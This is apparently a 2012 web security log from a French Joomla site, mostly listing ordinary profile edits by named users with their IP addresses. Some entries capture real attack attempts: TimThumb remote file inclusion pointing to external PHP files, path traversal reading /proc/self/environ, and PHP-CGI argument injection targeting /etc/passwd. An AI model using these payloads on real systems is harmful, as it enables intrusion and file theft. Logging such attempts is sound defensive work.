USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0 IP: 109.12.198.24 USER: mary.july REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2012-09-06 14:12:46 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 94.102.11.172 USER: visitor REQUEST: src=http://picasa.com.jewelrydna.com/bad.php PAR: //wp-content/themes/durable/timthumb.php?src=http://picasa.com.jewelrydna.com/bad.php 2012-09-06 14:18:21 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 94.102.11.172 USER: visitor REQUEST: src=http://picasa.com.jewelrydna.com/bad.php PAR: //wp-content/themes/durable/timthumb.php?src=http://picasa.com.jewelrydna.com/bad.php 2012-09-07 06:50:35 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0 IP: 109.12.198.24 USER: mary.july REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2012-09-07 06:55:22 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0 IP: 109.12.198.24 USER: mary.july REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2012-09-10 09:51:58 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 IP: 92.102.217.47 USER: cap-etica REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;font-size: 10pt; color: #000000;\&quot;&gt;&lt;st PAR: cb_presentation2 2012-09-10 09:55:44 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 IP: 92.102.217.47 USER: cap-etica REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;font-size: 10pt; color: #000000;\&quot;&gt;&lt;st PAR: cb_presentation2 2012-09-10 10:02:39 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 IP: 92.102.217.47 USER: cap-etica REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;font-size: 10pt; color: #000000;\&quot;&gt;&lt;st PAR: cb_presentation2 2012-09-10 10:15:09 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 IP: 92.102.217.47 USER: cap-etica REQUEST: data=&lt;p&gt;&lt;strong&gt;Cap Etica s\'engage naturellement et en toute transparence &Atilde;&n PAR: data 2012-09-10 10:18:59 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 IP: 92.102.217.47 USER: cap-etica REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;font-size: 10pt; color: #000000;\&quot;&gt;&lt;st PAR: cb_presentation2 2012-09-10 21:01:33 USER_AGENT: libwww-perl/6.04 IP: 77.92.150.187 USER: visitor REQUEST: src=http://picasa.com.kongoconnection.com/pagat.php PAR: /actualite/destinations-touristiques/1205-touri.html/wp-content/themes/dimenzion/timthumb.php?src=http://picasa.com.kongoconnection.com/pagat.php 2012-09-10 21:01:35 USER_AGENT: libwww-perl/6.04 IP: 77.92.150.187 USER: visitor REQUEST: src=http://picasa.com.kongoconnection.com/pagat.php PAR: /wp-content/themes/dimenzion/timthumb.php?src=http://picasa.com.kongoconnection.com/pagat.php 2012-09-10 21:01:37 USER_AGENT: libwww-perl/6.04 IP: 77.92.150.187 USER: visitor REQUEST: src=http://picasa.com.kongoconnection.com/pagat.php PAR: /actualite/destinations-touristiques/wp-content/themes/dimenzion/timthumb.php?src=http://picasa.com.kongoconnection.com/pagat.php 2012-09-12 07:06:54 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 IP: 109.13.9.222 USER: mary.july REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2012-09-12 07:07:57 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 IP: 109.13.9.222 USER: mary.july REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2012-09-12 08:08:45 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 IP: 92.102.217.47 USER: cap-etica REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;font-size: 10pt; color: #000000;\&quot;&gt;&lt;st PAR: cb_presentation2 2012-09-24 13:33:36 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0 IP: 130.190.23.158 USER: JulienBugli REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Tout dans ma formation et dans PAR: cb_presentation2 2012-09-24 13:34:32 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0 IP: 130.190.23.158 USER: JulienBugli REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;images/comprofiler/plug_cbfilefield/1117/CVBugliJulie PAR: cb_presentation2 2012-09-24 13:34:58 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0 IP: 130.190.23.158 USER: JulienBugli REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;images/comprofiler/plug_cbfilefield/1117/CVBugliJulie PAR: cb_presentation2 2012-10-02 01:35:50 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 IP: 190.90.3.82 USER: visitor REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;Engag&Atilde;&copy; PAR: cb_presentation2 2012-10-02 01:37:25 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 IP: 190.90.3.82 USER: bertrand.sinssaine REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;Engag&Atilde;&copy; PAR: cb_presentation2 2012-10-02 01:39:19 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 IP: 190.90.3.82 USER: bertrand.sinssaine REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-fam PAR: cb_presentation2 2012-10-02 01:40:15 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 IP: 190.90.3.82 USER: bertrand.sinssaine REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;&lt;em&gt;Engag& PAR: cb_presentation2 2012-10-02 01:49:41 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 IP: 190.90.3.82 USER: bertrand.sinssaine REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Je suis passionn&Atilde;&copy; PAR: cb_presentation2 2012-10-02 01:55:13 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 IP: 190.90.3.82 USER: bertrand.sinssaine REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Engag&Atilde;&co PAR: cb_presentation2 2012-10-02 01:56:18 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 IP: 190.90.3.82 USER: bertrand.sinssaine REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Engag&Atilde;&co PAR: cb_presentation2 2012-10-02 01:56:52 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 IP: 190.90.3.82 USER: bertrand.sinssaine REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Engag&Atilde;&co PAR: cb_presentation2 2012-10-02 01:58:41 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 IP: 190.90.3.82 USER: bertrand.sinssaine REQUEST: cb_presentation2=&lt;p&gt;&lt;strong&gt;Engag&Atilde;&copy; aupr&Atilde;&uml;s de l&Acirc;&acute; PAR: cb_presentation2 2012-10-02 02:00:53 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 IP: 190.90.3.82 USER: bertrand.sinssaine REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Engag&Atilde;&co PAR: cb_presentation2 2012-10-02 02:02:04 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 IP: 190.90.3.82 USER: bertrand.sinssaine REQUEST: cb_presentation2=&lt;p&gt;&lt;strong&gt;Engag&Atilde;&copy; aupr&Atilde;&uml;s de l&Acirc;&acute; PAR: cb_presentation2 2012-10-03 08:09:25 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 IP: 78.125.104.61 USER: mary.july REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2012-10-03 13:49:44 USER_AGENT: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 90.46.229.188 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Il fallait une bonne dose de courage, ou d& PAR: t33 2012-10-03 13:53:43 USER_AGENT: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 90.46.229.188 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Il fallait une bonne dose de courage, ou d& PAR: t33 2012-10-03 13:54:09 USER_AGENT: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 90.46.229.188 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Il fallait une bonne dose de courage, ou d& PAR: t33 2012-10-03 13:55:19 USER_AGENT: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 90.46.229.188 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Il fallait une bonne dose de courage, ou d& PAR: t33 2012-10-03 14:00:49 USER_AGENT: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 90.46.229.188 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Il fallait une bonne dose de courage, ou d& PAR: t33 2012-10-03 14:01:19 USER_AGENT: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 90.46.229.188 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Il fallait une bonne dose de courage, ou d& PAR: t33 2012-10-03 14:01:45 USER_AGENT: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 90.46.229.188 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Il fallait une bonne dose de courage, ou d& PAR: t33 2012-10-03 14:02:16 USER_AGENT: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 90.46.229.188 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Il fallait une bonne dose de courage, ou d& PAR: t33 2012-10-03 16:21:12 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: #000000;\&quot PAR: t33 2012-10-03 16:21:44 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: #000000;\&quot PAR: t33 2012-10-03 16:22:08 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: #000000;\&quot PAR: t33 2012-10-03 16:22:39 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: #000000;\&quot PAR: t33 2012-10-03 16:23:10 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: #000000;\&quot PAR: t33 2012-10-06 20:27:55 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:29:47 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:30:24 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:32:24 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:33:51 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:36:34 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:37:09 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:46:51 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:48:07 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:49:19 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:50:06 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:51:31 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:52:44 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:53:11 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:54:46 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:56:03 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 20:59:26 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 21:00:53 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 21:03:57 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 21:04:26 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 21:05:30 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 21:07:50 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 21:11:54 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-06 21:15:40 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-07 15:54:57 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-08 17:02:47 USER_AGENT: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1 IP: 109.10.30.201 USER: ClaireRingot REQUEST: cb_presentation2=&lt;p&gt;&amp;nbsp;&lt;/p&gt; &lt;p style=\&quot;text-align: justify;\&quot;&gt PAR: cb_presentation2 2012-10-08 17:03:57 USER_AGENT: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1 IP: 109.10.30.201 USER: ClaireRingot REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-siz PAR: cb_presentation2 2012-10-08 17:04:40 USER_AGENT: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1 IP: 109.10.30.201 USER: ClaireRingot REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-siz PAR: cb_presentation2 2012-10-12 18:57:41 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-14 13:38:53 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-14 13:39:47 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 IP: 87.91.232.13 USER: zelie REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: # PAR: cb_presentation2 2012-10-20 12:18:47 USER_AGENT: libwww-perl/5.803 IP: 46.105.2.157 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator/?option=com_ninjarsssyndicator&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%00 2012-10-20 12:18:48 USER_AGENT: libwww-perl/5.803 IP: 46.105.2.157 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /?option=com_ninjarsssyndicator&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%00 2012-10-20 12:18:48 USER_AGENT: libwww-perl/5.803 IP: 46.105.2.157 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/?option=com_ninjarsssyndicator&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%00 2012-10-27 17:17:10 USER_AGENT: Mozilla/5.0 IP: 210.153.126.162 USER: visitor REQUEST: -d_allow_url_include=On_-d_auto_prepend_file=__/__/__/__/__/__/__/__/__/__/__/etc/passwd= PAR: /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../etc/passwd%00%20-n 2012-10-29 07:43:28 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0.1 IP: 41.188.50.236 USER: tanymenatours REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: center;\&quot;&gt;&lt;span style=\&quot;color: #0 PAR: cb_presentation2 2012-11-06 18:25:51 USER_AGENT: FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com) IP: 85.17.162.14 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%00 2012-11-06 18:25:55 USER_AGENT: FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com) IP: 85.17.162.14 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%00 2012-11-06 18:25:56 USER_AGENT: FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com) IP: 85.17.162.14 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%00 2012-11-07 11:48:48 USER_AGENT: FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com) IP: 85.17.162.14 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%00 2012-11-07 11:48:49 USER_AGENT: FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com) IP: 85.17.162.14 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%00 2012-11-07 11:48:50 USER_AGENT: FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com) IP: 85.17.162.14 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%00 2012-11-08 18:18:30 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0 IP: 89.156.204.152 USER: visitor REQUEST: editor_body=&lt;table style=\&quot;margin: auto; padding-left: 20px; padding-right: 20px; width: PAR: editor_body 2012-11-09 12:14:08 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 